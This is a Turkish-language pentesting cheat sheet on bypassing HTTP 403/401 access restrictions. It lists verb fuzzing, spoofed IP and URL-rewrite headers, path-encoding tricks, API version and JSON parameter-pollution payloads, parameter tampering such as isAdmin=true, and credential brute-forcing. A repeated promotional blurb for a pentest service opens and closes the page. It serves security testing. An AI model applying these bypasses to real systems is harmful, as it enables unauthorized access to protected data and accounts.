403 & 401 Bypasses
Anında kullanılabilir zafiyet değerlendirme ve penetrasyon testi kurulumu. 20'den fazla araç ve özellikle tam bir pentest çalıştırın, raporlama ile başlayan özellikler. Pentester'ları değiştirmiyoruz - özel araçlar, tespit ve istismar modülleri geliştiriyoruz, böylece daha derine inmek, kabukları patlatmak ve eğlenmek için biraz zaman kazanıyorlar.
HTTP Fiilleri/Yöntemleri Fuzzing
Dosyaya erişmek için farklı fiilleri deneyin: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Yanıt başlıklarını kontrol edin, belki bazı bilgiler verilebilir. Örneğin,
Content-Length: 55
ile HEAD fiiline 200 yanıtı dosyaya erişebileceğini gösterir. Ancak yine de o bilgiyi dışarı çıkarmak için bir yol bulmanız gerekebilir.X-HTTP-Method-Override: PUT
gibi bir HTTP başlığı kullanarak kullanılan fiili geçersiz kılabilirsiniz.TRACE
fiilini kullanın ve çok şanslıysanız belki yanıtta ayrıca ara proxy'ler tarafından eklenen başlıkları görebilirsiniz ki bu faydalı olabilir.
HTTP Başlıkları Fuzzing
Host başlığını rastgele bir değere değiştirin (burada işe yaradı)
Kaynağa erişmek için başka Kullanıcı Ajanları kullanmayı deneyin.
HTTP Başlıklarını Fuzzlayın: HTTP Proxy Başlıklarını, HTTP Kimlik Doğrulama Temel ve NTLM brute-force (sadece birkaç kombinasyonla) ve diğer teknikleri deneyin. Tüm bunları yapmak için fuzzhttpbypass adlı aracı oluşturdum.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
Eğer yol korumalıysa bu diğer başlıkları kullanarak yol korumasını atlatmayı deneyebilirsiniz:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Sayfa bir proxy arkasında ise, belki de özel bilgilere erişmenizi engelleyen proxy'dir. HTTP İstek Kaçırma veya hop-by-hop başlıkları'ı kötüye kullanmayı deneyin.
Farklı yanıtlar aramak için özel HTTP başlıklarını Fuzzlayın.
HTTP Metotlarını Fuzzlarken özel HTTP başlıklarını Fuzzlayın.
Host başlığını kaldırın ve belki korumayı atlayabilirsiniz.
Yol Fuzzing
Eğer /yol engellenmişse:
Erişim bir proxy tarafından engelleniyorsa, /%2e/path _(bu korumayı atlayabilir, çift URL kodlamayı deneyin)_** /%252e**/path
Unicode atlatması deneyin: /%ef%bc%8fpath (URL kodlanmış karakterler "/") bu yüzden kodlanmış geri dönüştürüldüğünde //path olacak ve belki de /path adı kontrolünü zaten atlatmış olabilirsiniz
Diğer yol atlatmaları:
site.com/secret –> HTTP 403 Yasaklandı
site.com/SECRET –> HTTP 200 Tamam
site.com/secret/ –> HTTP 200 Tamam
site.com/secret/. –> HTTP 200 Tamam
site.com//secret// –> HTTP 200 Tamam
site.com/./secret/.. –> HTTP 200 Tamam
site.com/;/secret –> HTTP 200 Tamam
site.com/.;/secret –> HTTP 200 Tamam
site.com//;//secret –> HTTP 200 Tamam
site.com/secret.json –> HTTP 200 Tamam (ruby)
Tüm bu listeyi aşağıdaki durumlarda kullanın:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
Diğer API atlatmaları:
/v3/users_data/1234 --> 403 Yasaklandı
/v1/users_data/1234 --> 200 Tamam
{“id”:111} --> 401 Yetkisiz
{“id”:[111]} --> 200 Tamam
{“id”:111} --> 401 Yetkisiz
{“id”:{“id”:111}} --> 200 Tamam
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parametre Kirliliği)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parametre Kirliliği)
Parametre Manipülasyonu
Değiştir param değeri:
id=123
-->id=124
URL'ye ek parametreler ekle:
?
id=124
—->id=124&isAdmin=true
Parametreleri kaldır
Parametreleri yeniden sırala
Özel karakterler kullan
Parametrelerde sınır testi yap — -234 veya 0 veya 99999999 gibi değerler sağla (sadece bazı örnek değerler).
Protokol Sürümü
Eğer HTTP/1.1 kullanılıyorsa 1.0 kullanmayı dene veya hatta 2.0'yı destekleyip desteklemediğini test et.
Diğer Geçişler
Alan adının IP veya CNAME'sini al ve doğrudan iletişime geçmeyi dene.
Sunucuyu zorlamayı dene ve yaygın GET istekleri gönder (Bu kişi için Facebook'ta işe yaradı).
Protokolü değiştir: http'den https'ye veya https'den http'ye
https://archive.org/web/ adresine git ve geçmişte o dosyanın dünya çapında erişilebilir olup olmadığını kontrol et.
Kaba Kuvvet
Şifreyi tahmin et: Aşağıdaki yaygın kimlik bilgilerini dene. Kurban hakkında bir şey biliyor musun? Veya CTF meydan okuma adını mı biliyorsun?
Kaba kuvvet: Temel, sindirilmiş ve NTLM kimlik doğrulamasını dene.
Otomatik Araçlar
Anında kullanılabilir zayıflık değerlendirme ve penetrasyon testi kurulumu. 20'den fazla araç ve özellikle tam bir pentest çalıştırın, keşiften raporlamaya kadar uzanan. Pentester'ları değiştirmiyoruz - onlara daha derine kazma, kabukları patlatma ve eğlenme zamanı kazandırmak için özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
Last updated